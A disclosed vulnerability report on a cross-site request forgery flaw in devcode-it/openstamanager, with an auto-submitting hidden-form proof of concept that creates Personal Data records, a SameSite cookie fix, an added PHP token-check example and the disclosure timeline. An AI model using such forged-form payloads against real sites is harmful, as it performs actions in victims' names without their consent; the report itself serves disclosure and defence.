Cross-Site Request Forgery (CSRF) in devcode-it/openstamanager

Valid

Reported on

Jul 31st 2021


✍️ Description

An attacker is able to create arbitrary Personal Data records if a user visits an attacker-controlled site.

🕵️‍♂️ Proof of Concept

1. Open PoC.html in Firefox or Safari.

2. Check that a Personal Data record with Denomination "aaa" has been created.

// PoC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost:8000/openstamanager/controller.php?id_module=2" method="POST">
      <input type="hidden" name="id&#95;module" value="2" />
      <input type="hidden" name="id&#95;plugin" value="" />
      <input type="hidden" name="op" value="add" />
      <input type="hidden" name="backto" value="record&#45;edit" />
      <input type="hidden" name="ragione&#95;sociale" value="aaa" />
      <input type="hidden" name="idtipoanagrafica&#91;&#93;" value="6" />
      <input type="hidden" name="cognome" value="" />
      <input type="hidden" name="nome" value="" />
      <input type="hidden" name="piva" value="" />
      <input type="hidden" name="codice&#95;fiscale" value="" />
      <input type="hidden" name="tipo" value="" />
      <input type="hidden" name="indirizzo" value="" />
      <input type="hidden" name="cap" value="" />
      <input type="hidden" name="citta" value="" />
      <input type="hidden" name="provincia" value="" />
      <input type="hidden" name="id&#95;nazione" value="" />
      <input type="hidden" name="telefono" value="" />
      <input type="hidden" name="cellulare" value="" />
      <input type="hidden" name="email" value="" />
      <input type="hidden" name="pec" value="" />
      <input type="hidden" name="codice&#95;destinatario" value="" />
      <input type="hidden" name="hash" value="&#35;tab&#95;0" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

💥 Impact

This vulnerability allows an attacker to create arbitrary Personal Data records on behalf of the victim.

Fix

Set SameSite attribute of cookies to Lax or Strict.
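As an added illustration of the fix (this is not OpenSTAManager's own code and is not what commit 402dca contains), a PHP request handler that sets the SameSite attribute on the session cookie as recommended above and, as defence in depth beyond what the report states, also requires a per-session synchronizer token on the state-changing POST. Function and field names are hypothetical.

```php
<?php
// Added defensive example (not OpenSTAManager's code). Hardens a POST handler
// like the one targeted by PoC.html (controller.php?id_module=2, op=add):
//  1. the session cookie carries SameSite=Lax, so a browser will not attach it
//     to the cross-site form POST auto-submitted from the attacker's page;
//  2. a synchronizer token is required, so even a browser without SameSite
//     support cannot be used to forge the request.
declare(strict_types=1);

// 1. Cookie attributes: the array form of session_set_cookie_params()
//    (PHP >= 7.3) accepts 'samesite' directly.
session_set_cookie_params([
    'lifetime' => 0,
    'path'     => '/',
    'secure'   => true,   // send only over HTTPS
    'httponly' => true,   // not readable from JavaScript
    'samesite' => 'Lax',  // or 'Strict'; both block the PoC's cross-site POST
]);
session_start();

// 2. Synchronizer token: generated once per session, embedded in every form.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Hidden field to place inside the Personal Data form (hypothetical name).
function csrf_field(): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '">';
}

// Reject a state-changing request whose token is missing or does not match.
// hash_equals() compares in constant time.
function csrf_check(array $post): void
{
    $sent = $post['csrf_token'] ?? '';
    if (!is_string($sent) || !hash_equals(csrf_token(), $sent)) {
        http_response_code(403);
        exit('Invalid CSRF token');
    }
}

// In the handler: validate before reading ragione_sociale and the other fields.
if ($_SERVER['REQUEST_METHOD'] === 'POST' && ($_POST['op'] ?? '') === 'add') {
    csrf_check($_POST);
    // ... create the Personal Data record ...
}
```

With these changes the auto-submitted form in PoC.html arrives without the session cookie (SameSite) and without a valid token, so the request is rejected instead of creating a record.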

Occurrences

We have contacted a member of the devcode-it/openstamanager team and are waiting to hear back 2 months ago
amammad
2 months ago

Researcher


hey man, I just want to be sure you see this report too.

devcode-it/openstamanager maintainer validated this vulnerability 2 months ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
devcode-it/openstamanager maintainer confirmed that a fix has been merged on 402dca 2 months ago
The fix bounty has been dropped